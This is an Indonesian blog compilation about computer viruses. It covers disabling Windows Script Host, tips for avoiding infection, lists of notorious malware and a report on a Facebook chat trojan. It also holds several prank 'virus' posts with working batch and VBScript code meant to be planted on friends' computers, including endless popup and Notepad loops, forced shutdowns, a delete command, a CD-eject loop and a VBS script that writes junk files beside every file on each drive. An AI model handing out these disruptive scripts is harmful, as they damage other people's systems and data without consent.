Mematikan option Windows Script Host

WSH atau yang dikenal sebagai Windows Script Host adalah salah satu option yang disediakan oleh Microsoft untuk menjalankan aplikasi VBS. Dengan berkembangnya virus-virus di dunia maya sekarang ini, banyak sekali para pembuat virus menggunakan fasilitas tersebut untuk menjalankan virus-virus yang berektensi VBS. Sebut saja virus VBS.Redlof dan VBS.Lovelorn mungkin masih banyak lainnya yang akan menyusul.
Sebenarnya kalau kita menonaktifkan fasilitas atau opsi WSH tersebut, serangan virus VBS dapat diminimalkan. Banyak para pemakai komputer tidak menyadari bahkan tidak mengetahui, bahwa dengan menonaktifkan virus tersebut tidak akan menyebar dengan cepatnya.
Fasilitas WSH ada disemua komputer yang memakai system operasi Windows NT, ME, 2000, XP dan Windows Server 2003.
Windows NT
  1. Komputer anda harus login sebagai ‘administrator’.
  2. Pada ‘Desktop’, atau ‘Windows Explorer’, klik kanan pada ‘My Computer’.
  3. Pilih ‘Open’ dari menu yang tersedia.
  4. Pada ‘My Computer’ window, buka menu ‘View’ dan pilih ‘Options’.
  5. Buka tab ‘File Types’.
  6. Lihat ‘VBScript Script File’ pada list type file .
  7. Klik tombol ‘Remove’.
  8. Jika Anda mendapatkan sebuah dialog pertanyaan, Anda konfirmasi bahwapenghapusan akan dilakukan, Dan anda dapat menekan tombol ‘YES’
Windows 2000/Me/XP/2003
  1. Komputer anda harus login sebagai ‘administrator’
  2. Pada ‘Desktop’, atau ‘Windows Explorer’, klik kanan pada ‘My Computer’.
  3. Pilih ‘Open’ dari menu.
  4. Pada ‘My Computer’ window, buka menu ‘Tools’ dan pilih ‘Folder Options’.
  5. Buka tab ‘File Types’.
  6. Cari ‘VBScript Script File’ pada list type file
  7. Klik pada tombol ‘Delete‘.
  8. Jika Anda mendapatkan sebuah dialog pertanyaan, Anda konfirmasi bahwa penghapusan akan dilakukan, Dan anda dapat menekan tombol ‘YES’
 

10 CARA MENCEGAH VIRUS MASUK

Windows... Siapa sih yang tidak kenal dengan mana itu ?  Sistem Operasi Komputer yang paling populer saat ini dan hampir setiap orang di belahan dunia manapun menggunakan Windows sebagai Sistem Operasi yang merupakan bagian penting dari komputer. Bahkan pernah ada anggapan kalau yang namanya komputer ya ada windowsnya, anggapan ini sering di percayai oleh orang yang belum tahu seluk beluk komputer, yang mereka tahu hanya tinggal pakai saja seperti di warnet. Begitupun Saya, saya dulu juga menganggap demikian. Sudah terasakan ? bagaimana populernya sistem operasi windows, bahkan akibat dari kepopulerannya membuat sistem operasi yang satu ini sebagai " ladang " dari virus komputer dan paling sering terkena hack! Nah, because it, saya akan memberikan 10 jurus sakti mencegah virus masuk ke komputer/laptop kita. Berikut jurusnya : 

1. Selalu lakukan scan terhadap flashdisk yang masuk ke dalam PC dan laptop anda.

Langkah ini merupakan langkah wajib yang harus Anda lakukan! Karena penyebaran virus lewat media flash disk masih banyak terjadi dan anehnya, pemilik flash disk tersebut terkadang tidak tahu kalau flash disknya sudah menjadi sarang virus ganas maupun ringan. Nah maka dari itu kita wajib men-scan setiap flash disk yang masuk ke komputer atau laptop kita sebagai langkah awal menghalau virus masuk dan menginfeksi komputer kita.

2. Scan juga Cd yang masuk ke dalam Cd drive anda.

Jurus kedua ini mirip dengan jurus pertama. Tetapi untuk men-scan sebuah CD atau DVD memang lebih repot, terutama CD atau DVD yang hanya bisa sekali tulis atau CD R. Maka dari itu, hal terpenting ialah saat Anda akan mem-burn file atau data pastikan file tersebut bebas dari virus dan worm.

3. Lakukan scan terhadap harddisk Anda, tiap kali akan mulai bekerja dengannya.

Scan harddisk merupakan jurus ketiga yang tidak kalah pentingnya. Scan harddisk ini selain untuk men-scan Virus, juga bisa digunakan untuk membuat komputer lebih bekerja dengan cepat karena virus yang terdeteksi ( jika ada ) akan dihapus dan hal ini tentu saja membuat harddisk Anda lebih aman dari serangan virus saat bekerja. Sebaiknya Scan Harddisk saat akan mulai dan sesudah selesai bekerja dengan komputer atau laptop Anda.

4. Proteksi flash disk anda, jika anda memasukaannya ke dalam PC atau notebook orang lain.

Jurus ke empat ini merupakan jurus optional. Karena semua itu tergantung kepada Anda, Anda dapat men-scan flash disk itu di tempat Anda sendiri. Tetapi saya merekomendasikan agar Anda melakukan proteksi terhadap flash disk Anda, selain lebih aman, hal ini juga tidak boros waktu. Namun, proteksi flash disk ini akan memakan space flash disk. 

5. Jangan sembarangan men-download attachment.

Ini merupakan jurus kelima yang dikhususkan ke Avatar. Begitu juga kepada Anda yang sering download mendownload file maupun gambar. Pastikan file yang Anda download udah ter-scan oleh penyedia download Anda dan ada stempel bebas virus! Jangan sekali-kali mendownload file yang mencurigakan dan tidak dikenal, karena virus, worm, spyware, trojan dan hacker bisa mengawasi Anda melalui file mencurigakan tadi!

6. Selektif dalam membuka e-mail.

Hampir setiap orang didunia saat ini mempunyai email. Baik yang punya komputer dan laptop pribadi, maupun yang hanya punya handphone. Dengan berkembangnya email di dunia ini, ini juga menjadi sasaran empuk penjahat cyber untuk melakukan aksinya lewat email, baik hanya sekedar spam sampai ke penipuan! Wow.:-) begitu juga dengan virus, virus ini biasanya diselipkan pada file yang terlampir pada email tersebut. Jadi kalau kita mendapat email yang tidak dikenal, alangkah baiknya kita biarkan saja atau me-remove email itu sekalian.

7. Memasang dan selalu meng-update program antivirus pada komputer anda.

Untuk apa kita mempunyai antivirus paling hebat di dunia tetapi database virusnya tahun 2005. Virus yang tercipta diatas tahun itu ya masih dapat bebas berkeliaran dan menyerang komputer dan laptop milik Anda. Jadi update selalu antivirus anda merupakan hal terpenting dan paling dianjurkan untuk mencegah dan men-scan virus, worm dan trojan nakal.

8. Selalu mengikuti perkembangan berita terbaru tentang virus.

Jangan hanya membuka facebook dan twitter saja! Kedua situs itu hanya menyediakan status dan twit galau dari " teman-teman " kita. Sesekali bukalah situs yang membahas tentang virus dan komputer kayak situs ini. Jadi kita bisa melakukan langkah awal jika terkena serangan virus itu. Jadilah Anda orang yang paling narsis masalah virus.

9. Men-download microsoft outlook security patch ke dalam sistem komputer anda.

Dengan mendownload ini, maka komputer anda akan terlindungi melalui server microsoft jika terhubung ke internet beberapa waktu, untuk info lebih lanjut. Cari di google aja dan untuk mendownloadnya dapat mencari link downloadnya di google.

10. Menonaktifkan windows scripting host.

WSH atau yang dikenal sebagai Windows Script Host adalah salah satu option yang disediakan oleh Microsoft untuk menjalankan aplikasi VBS. Dengan berkembangnya virus-virus di dunia maya sekarang ini, banyak sekali para pembuat virus menggunakan fasilitas tersebut untuk menjalankan virus-virus yang berektensi VBS. Sebut saja virus VBS.Redlof dan VBS.Lovelorn mungkin masih banyak lainnya yang akan menyusul.
 

10 Virus Komputer Paling Ganas Di Dunia

Nah pada kesempatan kali ini, Saya akan membahas tentang 10 Virus Paling Ganas Di Dunia, Virus adalah perangkat perusak yang bisa merusak perangkat lunak sampai perangkat keras

Berikut ini adalah 10 Virus Komputer Paling Ganas Di Dunia:

1.Storm Worm
Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.
2. Leap-A/Oompa- A
Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.    
3. Sasser and Netsky
Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 taon 9 bulan, karena umurnya masih di bawah 18 taon.
4. MyDome (Novarg)
Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.
5.SQL Slammer/Saphire
Muncul Januari 2003, nyebar cepet lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash, ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapap penerbangan karena eror check in ama tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.
6.Nimda
Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet, menyebar lewat Internet. Nimda akan ngebuat backdoor ke OS. jadi penyerang bisa akses ke server dan berbuat apa saja Nimda juga menjadi DDoS.
7.Code Red & Code Red II
Muncul musim panas 2001, nyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi ngabisin memori. Paling seru waktu berhubungan ama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.
8.The Klez
Nongol taon 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer ga bisa beroperasi, bisa berhentiin program antivirus.
9.ILOVEYOU
Abis “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.
10.Melissa
Dibikin taon 1999 sama David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis ngirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan.
 

Membuat Virus Komputer Yang Paling Gampang!

sebenarnya postingan ini sudah ada di blog lama saya yang tidak aktif lagi. Juga sudah rada disinggung di postingan ini. Tetapi dengan alasan kurang ‘kena’ saya buat saja posting khususnya (walaupun pendek). Biar kalau ada yang berkunjung ke blog ini menggunakan Google dengan kata kunci "Membuat Virus Mudah Gampang Sekali Beginner etc etc bla bla.." bisa kena hits juga di Google hahaha. Mbaiklah kita mulai saja…
Kita dapat menguji antivirus komputer kita apakah bekerja dengan baik dengan bantuan dari sebuah file spesial, dikenal juga dengan nama “File Test Antivirus Standar EICAR” (EICAR adalah singkatan dari European Institute of Computer Anti-virus Research). Ini adalah file dummy, yang dapat dideteksi sebagai virus oleh sebuah produk antivirus. So, ga ada yg harus dikhawatirkan, karena file ini bukan virus yang sebenarnya kok! (NOT A REAL VIRUS!!). Yang file ini lakukan ketika dieksekusi adalah hanya akan menampilkan teks ‘EICAR-STANDARD-ANTIVIRUS-TEST-FILE’ dan kemudian nge-close dengan sendirinya…
Nah.. sekarang bagaimana cara membuat file EICAR itu sendiri?? tinggal buka notepad atau teks editor kesayangan anda yg laen, dan kopi-pasteu teks dibawah ini:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Kemudian save file dengan nama apapun dengan ekstensi *.COM atau *.EXE… (misalnya: EICAR.COM atau EICAR.exe)
Sekarang bagaimana dengan reaksi antivirus nya?
  • Antivirus yg sangat baik akan: memblok proses write/save file ini walaupun dengan ekstensi apapun.. bahkan TXT… Jadi sebelum file ini sempet mampir di komputer anda, dia udah diusir (hus..hus..)
  • Antivirus yg baik akan: memperingatkan user bahwa ada file virus di komputer mereka dan meng-karantina file
  • Antivirus yg sedang2 saja akan: menolak eksekusi file ini ketika kita double klik
  • Antivirus yg tidak baik akan: permissive ama file ini ketika dieksekusi.. sehingga teks ’EICAR-STANDARD-ANTIVIRUS-TEST-FILE’ akan muncul di layar anda.
Selamat mengetes antivirus, selamat mengetahui reaksi antivirus anda, apakah reaktif atau berespon lama… By the way… ga mau kena virus? ganti sistem operasi aje.. jangan Windows ye… hehe…
WAHH.. BISA UNTUK ISENGIN KOMPUTER TEMEN NIH???
Hahahaha… selanjutnya… terserah anda…
 

Ada Virus di Linux/Ubuntu? Siapa takut!

Jangan biarkan PC anda di opname :D
Okey Boz, kita ketemu lagi :D . Pada postingan kali ini saya akan membahas tentang  virus di Linux khususnya Ubuntu. Adakah virus yang menjangkiti Ubuntu kita?, adakah anti virus yang mujarab untuk virus tersebut?. Mari kita selidiki bersama-sama :D .
Pada dasarnya virus adalah suatu kode yang dibuat oleh Cracker baik dengan efek yang main-main sampai efek yang menakutkan. Tentu saja virus ini tidak menguntungkan kita bahkan mengganggu aktivitas kita dalam berkomputer ria. Virus sendiri berkembang sangat cepat di komputer sama halnya virus Sars/HIV pada manusia. Terlebih lagi pada sistem operasi Windows virus tumbuh & berkembang subur layaknya rambut di kepala. Virus dapat hidup di sistem operasi komputer melalui celah-celah keamanan yang bisa ditembus. Hal ini bisa diakibatkan karena sistem keamanan sistem operasi tersebut sangatlah rapuh & belum di update dengan yang baru. Memang dengan memasang anti virus bisa melumpuhkan berbagai macam virus tersebut & menangkalnya. Tetapi developer virus itupun juga meningkatkan kemampuan virusnya untuk mempunyai efek merusak yang dahsyat.
Efek Samping adanya Virus :D
Pernahkah anda mengalaminya??
Kalau keluar ini bunyinya "tung"
Lalu kabar tentang adanya virus di Linux apakah benar?. Ya, tepat sekali pertanyaan anda. Di Linux pun yang kita ketahui sendiri bahwa salah satu keunggulannya yaitu bebas dari virus berbagai jenis itu pun masih tetap ada virusnya. Bedanya virus di Windows dengan Linux yaitu virus di Linux hanya untuk proof of concepts atau hanya untuk pembuktian bahwa Linux pun bisa digerayangi virus. Namun dengan segala keunggulan Linux mulai dari sistem keamanannya yang handal & update keamanan secara kontinyu membuat sistem operasi ini tak ada lawan :D .

Apakah virus di Windows bisa menyerang Linux?. Pertanyaan yang bagus, pada dasarnya virus yang menjangkiti Windows diciptakan oleh Cracker menggunakan sarana program visual basic. Sebuah program untuk menciptakan aplikasi pada Windows. Tentu saja hasil dari penciptaan virus dari visual basic tadi hanya berlaku untuk kelompoknya saja yaitu Windows. Arti kata lain virus versi Windows ini terbaca di Linux tetapi tidak dapat berjalan karena sudah berbeda sistem operasinya. Jawaban dari pertanyaan di atas adalah virus di Windows tidak bisa menular ke Linux. Tentu saja hal itu adalah sesuatu yang sangat membanggakan.
Ada pertanyaan lagi, bagaimana cara menghapus virus Windows di Linux bila memang Linux itu hebat??. Bagus sekali pertanyaannya, virus yang menjangkiti Windows biasanya akan bertengger di suatu tempat yang tidak terjamah oleh anti virus. Misalnya saja bila kita pulang dari warnet ber OS Windows dengan memakai USB Flash Disk sebagai media penyimpanan data. Bila kita lihat di komputer ber OS Windows yang anti virusnya yang belum di update/memang anti virusnya sendiri yang tidak mampu membantai virus itu maka akan menular ke komputer ber OS Windows. Walaupun kita sudah berkali-kali memindai perangkat keras itu seolah-olah bebas dari virus. Tetapi bila kita melihat Flash Disk yang baru kita pakai dari warnet ber OS Windows maka akan terlihat dengan sangat jelas berkas-berkas sampah yang mendiami Flash Disk kita. Saya bisa mengatakan demikian karena saya pernah mengalami hal ini & bukan sekedar teori saja. Lalu bila ada pernyataan bahwa virus di OS Windows tidak akan berkembang di Linux, bagaimanakah cara menghapusnya?? Baiklah, cara untuk menghilangkan virus yang kita contohkan pada Flash Disk itu yakni dengan menghubungkannya dengan komputer bersistem operasi Linux. Setelah Flash Disk itu kita mount, maka carilah file-file yang bukan milik kita & mencurigakan lalu kita tekan Delet pada keyboard. Agar lebih tuntas lagi menghilangkan virus di Flash Disk kita yaitu di jendela explorer di Linux anda(misalnya Nautilus di Ubuntu saya) klik View>Show Hidden Files. Maka akan jelas terlihat file-file yang bersembunyi di Flash Disk lalu segera Delete. Semudah itukah menghapus virus Windows di Linux?, Ya semudah itu :D .
Virus yang terdeteksi di Konqueror, PCLinuxOS
Bila anda penasaran dengan virus yang telah diciptakan untuk sistem operasi Linux berikut saya tulis listnya:
Kategori Trojan
1. Kaiten-Linux.Backdoor.Kaiten kuda trojan
2. Rexob-Linux.Backdoor.Rexob trojan
Kategori Virus
1. Alaeda-Virus.Linux.Alaeda
2. Bad Bunny-Perl.Badbunny
3. Binom-Linux-Binom
4. Bliss
5. Brundle
5. Bukowski
6.Diesel-Virus.LinuxDiesel.962
7. Kagob a-Virus.Linux.Kagob a
8. Kagob b-Virus.Linux.Kagob b
9. MetaPHOR(Simile)
10. Nuxbee-Virus.Linux.NUxbee.1403
11. OSF.8759
12. Podloso
13. Rike-Virus.Linux.Rike.1627
14. RST-Virus.Linux.RST.a(menginfeksi Mozilla Suite 1.7.6 & Thunderbird 1.0.2 versi Korea di September 2005)
15. Satyr-Virus.Linux.Satyr.a
16. Staog
17. Vit-Virus.Linux.Vit.4096
18. Winter-Virus.Linux.Winter.341
19. Winux(Lindose & PEEif)
20. Wit virus
21. ZipWorm-Virus.Linux.Zipworm
Kategori Worms
1. Adm-Net-Worm.Linux.Adm
2. Adore
3. Cheese-Net-Worm.Linux.Cheese
4. Devnull
5. Kork
6. Linux/Lion
7. Mighty-Net-Worm.Linux.Mighty
8. Millen-Linux.Millen/Worm
9. Ramen worm
10. Slapper
11. SSH Bruteforce
Setelah melihar daftar virus, worm & trojan di atas maka terlihat sudah banyak yang membuat aplikasi sampah itu di Linux. Tetapi lagi-lagi karena sistem keamanan, hak akses root yang berlaku untuk super usernya saja membuat virus-sirus di atas tidak akan berakibat serius.
Melihat berbagai anti virus di Windows, apakah di Linux juga banyak anti virusnya??. Ya, ada banyak anti virus yang dapat kita gunakan di Linux. Ada juga pembuat anti virus untuk Windows juga membuat anti virus untuk Linux. Berikut anti virusnya yang berjalan di Linux
  1. Avast (versi freeware & komersil)
  2. AVG (versi freeware & komersil)
  3. Avira (versi freeware & komersil)
  4. Bitdefender (versi freeware & komersil)
  5. ClamAV (free open source software)
  6. Eset (versi komersil)
  7. F-Secure Linux (versi komersil)
  8. Kaspersky Linux Security (versi komersil)
  9. McAfee Virus Scan Enterprise for Linux (versi komersil)
  10. Panda Security for Linux (versi komersil)
  11. Sophos (versi komersil)
  12. Symantec Anti Virus for Linux (versi komersil)
  13. Trend Micro Server Protect for Linux (versi komersil)
Sungguh banyak sekali anti virus untuk Linux yang juga mempunyai beragam versi. Meskipun sistem operasi Linux tahan banting bila anda masih membutuhkan anti virus untuk berjaga-jaga maka silahkan memilih. Masih kurangkah Linux bagi anda??? :D
 

Sebar virus di CATING Facebook

Pernah-kah Anda mendapatkan pesan chat pada Facebook dari salah satu kontak Facebook Anda ? Pesan chat tersebut memberikan sebuah link tertentu. (lihat gambar 1)
21″ border=”0″ />
Gambar 1, Pesan FB Chat bervirus


Jika Anda meng-klik link pada pesan chat tersebut, maka secara otomatis file virus akan terdownload ke dalam komputer Anda. Dan jika Anda menjalankan file tersebut, maka komputer Anda akan terinfeksi oleh virus tersebut.


Jika anda familiar dengan salah satu varian worm


yang menyebar via chat seperti YM (Yahoo! Messenger) atau Skype, maka anda patut waspada, karena VaksinCom telah menerima laporan serangan worm/rootkit/trojan yang menyebar menggunakan pesan chat pada FB. Hebatnya, virus ini tidak memanfaatkan Apps Facebook sehingga administrator Facebook tidak bisa menghentikan virus ini dibandingkan dengan virus Facebook lain yang mengandalkan Apps.

Sejak pertengahan Agustus hingga saat ini banyak pengguna komputer yang sudah terinfeksi oleh serangan worm/rootkit/trojan ini, dan varian tersebut terdeteksi oleh Norman sebagai W32/Kolab.xx. (lihat gambar 2)


19″ border=”0″ />
Gambar 2, Norman mendeteksi varian W32/Kolab.xx


Keluarga ZBOT : Broadcast message

Keluarga ZBOT merupakan salah satu kelompok trojan/backdoor yang dirancang untuk mencuri informasi/data dari pengguna komputer terutama hal-hal yang berhubungan dengan data pribadi keuangan khususnya yang berhubungan dengan Internet Banking.


Sedangkan varian worm/rootkit/trojanKolab merupakan salah satu varian dari ZBOT yang muncul sejak pertengahan Agustus 2011. Varian ini memiliki kemampuan mengirim pesan yang disertai link yang memiliki konten bervirus. Link yang dikirimkan pun bermacam-macam sesuai dengan jenis varian. Trojan Kolab juga diidentifikasikan sebagai W32/Kryptik atau W32/SlenfBot.


Trojan ini memiliki kemiripan (atau mungkin merupakan bagian) dengan kelompok malware YM (ChyMine/YiMfoca, yang identik menyebar menggunakan akun YM, Skype, Gtalk, dan lain-lain) karena memiliki file dan lokasi yang sama persis dengan malware YM.


Gejala & Efek Trojan Kolab

Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :

  • BSOD, menumpang svchost
Trojan Kolab tidak berjalan pada proses atau services Windows, sehingga sulit menemukan dan mematikan keberadaan trojan ini. Tetapi, trojan ini justru mendompleng atau menumpang pada file svchost.exe milik Windows, sehingga Anda akan sulit mematikan-nya. Jika Anda memaksa mematikan file svchost.exe, komputer akan blue screen (lihat gambar 3). Termasuk jika Anda mencoba melakukan scan menggunakan tools removal tertentu seperti GMER (tools mendeteksi rootkit).

 

Buat Virus Lucu Dari Notepad

Dari sekian postingan tentang cara membuat virus di blog ini mungkin ini yang paling gokil dan jahil, karena tidak hanya komputernya yang bingung tapi orangnya juga akan jengkel.
Penasaran nih ?
Dibawah ada beberapa script kode untuk membuat virus silahkan di ubah atau langsung dikopi ke notepad anda.

1. Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program
yang sok-sok jadi virus :)

@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau............................
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat

 2.  Membuat Virus Wants to Be A Milionaire

@echo off

title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh...
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat


3. Membuka notepad terus-menerus

@ECHO off

:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat

4. Shutdown sendiri dan kirim pesan otomatis

Set wshShell

=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan dengan .vbs

5. CD Room terbuka dan tertutup terus

Set oWMP = CreateObject

("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs

Catatan :
Hanya sekedar referensi agar lebih waspada terhadap setiap software atau program yang ada di computer, laptop atau di internet agar tidak mudah percaya begitu saja karena akibatnya sangat fatal.
 

Virus Gokil ala ci huyyy cueyyy

VIRUS ini ampuh untuk NGERJAIN temen (Yang belom tau tentunya...!)
1. Buka Notepad kemudian ketik / COPAS kata-kata dibawah ini:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")


2. Simpan File di Folder tujuan dengan nama VIRUS.VBS

3. Coba buka File tersebut. Akan muncul pops:
"A virus has been detected it's working . . . . . . .".

4. Paling seru kalo File ini disimpan di Folder yang paling sering dibuka oleh calon korban.

5. Anda bisa merubah kalimat seperti :
lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")

6. Catatan:
" File ini bukan berupa Virus dan tidak ada pengaruh sama sekali diKomputer anda"

6. So.....Selamat Menikmati.
  n'  carilah korban sebanyak-banyaknya
 

CARA MEMBUAT VIRUS GOKIL LEWAT NOTEPAD

Halo kawan  gmna punya kabar? Yuk ita belajar bikin virus.  .lumayan ampuh lho. . .lucu tapi ya gtu dech. . .agak serem dikit. Juga agak gmana gitu. . . ..

1. baca bismillah dulu...
2. buka notepad nya...
3. trus udah gitu copy kode berikut ke notepad..

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM CATUREKO!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +627840xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA SALAM BUAT BAPAK IBU KAMU YA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “MET NGA'I AJA YA....”

4. nah kalo udah simpen aja dengan nama "virus ganas.bat"
5. nah kalo mw ngaktifin virusnya tinggal klik file .batnya 2X...
6. tapi sebaiknya ni virus jangan di coba di komputer/laptop milik kita sendiri...ntar malah pusing kita.

inget ya nih virus buat ngerjain temen yang ga kita suka aja(hehe sengaja aku buat kaya gini), o ya ni virus cuma akan merestart komputer temen anda n memberi tulisan2 yang membuat teman anda merasa bahwa ada virus yang ganas di komputernya.....beressss..met mencoba...
 

Script Virus Sederhana

Berikut adalah contoh script virus sederhana buatanku sendiri. efeknya tidak berbahaya bagi komputer, hanya saja bikin sebel.. hehe.. ^___^
virus ini hanya menduplikasi file2 dan folder2 yang ada di setiap drive kemudian menamai file2 dan folder2 tersebut dengan ekstensi *.X RPL 1
virus ini dibuat dengan bahasa pemrograman visual basic script.

berikut script virus tersebut..
================================================
rem – “shinobi303 virus" – By shinobi303
rem – dibuat : 7 Maret 2011
On Error Resume Next
dim A,B,C
set A=CreateObject(“Scripting.FileSystemObject”)
B=”Hallo! jangan khawatir…aku tidak berbahaya… tp sedikit mengganggu.. – by shinobi303″
B=replace(B,chr(42),chr(68))
B=replace(B,chr(124),chr(46))
C=replace(B,chr(37),chr(76))
n Error Resume Next
dim D,E
set E=A.Drives
for each D in E
if (D.DriveType=2)or(D.DriveType=3) then
indexFolders(D.Path&”\”)
end If
next
sub indexFolders(location)
On Error Resume Next
dim F,file,G,duplicate
set F=A.GetFolder(location)
set G=F.SubFolders
for each file in G
set duplicate = A.CreateTextFile(file.Path&”.yudhi”, 2, True)
duplicate.write C
duplicate.Close
writeData(file.Path)
indexFolders(file.Path)
next
end sub
sub writeData(location)
On Error Resume Next
dim folder,directory,file,duplicate
set folder=A.GetFolder(location)
set directory=folder.Files
for each file in directory
set duplicate = A.CreateTextFile(file.Path&”.yudhi”, 2, True)
duplicate.write C
duplicate.Close
next
end sub
================================================

simpan dengan ekstensi *.vbs, Kemudian jalankan..
 

5 VIRUS PALING MEMATIKAN

Virus-virus komputer paling berbahaya tersebut banyak menyedot perhatian pengguna komputer di seluruh dunia, karena dampat global yang ditimbulkannya. Pada artikel ini akan dijabarkan 5 virus komputer paling berbahaya yang pernaha muncul.
Berikut 5 virus komputer paling berbahaya yang pernaha ada

SQL Slammer / Sapphire
